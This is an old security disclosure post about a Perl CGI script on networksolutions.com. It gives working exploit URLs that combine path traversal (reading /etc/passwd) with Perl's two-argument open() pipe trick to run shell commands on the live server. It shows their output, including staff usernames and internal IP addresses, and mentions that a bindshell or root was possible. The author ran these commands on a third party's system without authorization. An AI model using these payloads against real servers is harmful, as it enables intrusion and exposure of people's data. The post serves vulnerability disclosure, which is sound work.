networksolutions.com: www security hole. (may/9/2000)

Major security issue with networksolutions.com (easysteps.pl).  I was in
#r00tabega, and someone relayed this (it was told to me that Mr^Chaos found the
original read bug):

http://www.networksolutions.com/cgi-bin/makechanges/easysteps/easysteps.pl?STRING=maymun.com&FILE=/../../../../../../../etc/passwd

So with that initial bug found, I downloaded the perl script containing the bug
itself.  I noticed that a bigger problem existed:

---

# two-argument open(): perl interprets the filename, so a trailing '|' runs it as a command
open(CURR_FILE, $finalpath) or die "EASYSTEPS: Can't open file $finalpath\n";
my @LINES = <CURR_FILE>;
close(CURR_FILE);

---

$finalpath is for the most part supplied by the user.  Knowing that open() can
be used to execute programs, I used the initial bug for this, by going to
the root dir and then accessing the file I wanted to execute, followed by the
pipe:

opened: http://www.networksolutions.com/cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../bin/id|
return: uid=60001(nobody) gid=60001(nobody)

opened: http://www.networksolutions.com/cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../bin/uname%20-a|
return: SunOS www1 5.6 Generic_105181-15 sun4u sparc SUNW,Ultra-Enterprise

opened: http://www.networksolutions.com/cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../bin/who|
return: "
matthewh   pts/1        Apr 17 11:32    (216.168.238.173)
rholgado   pts/2        Apr 17 15:35    (216.168.235.124)
schauhan   pts/3        May  4 16:05    (216.168.238.21)
pvirador   pts/4        Apr 20 17:02    (216.168.238.21)
rholgado   pts/5        Apr 18 13:39    (216.168.235.124)
rholgado   pts/6        Apr 18 13:40    (216.168.235.124)
"

I decided NOT to be retarded.  But, I could have written a bindshell to a tmp
directory and connected.  While looking around the system I noticed some
public exploits that would have been able to get me root.

I just thought it was worth commenting on a major corp having
such an obvious bug. (I don't want to go to jail, I don't know about you.)

vade79[v9@fakehalo.org] -> www.fakehalo.org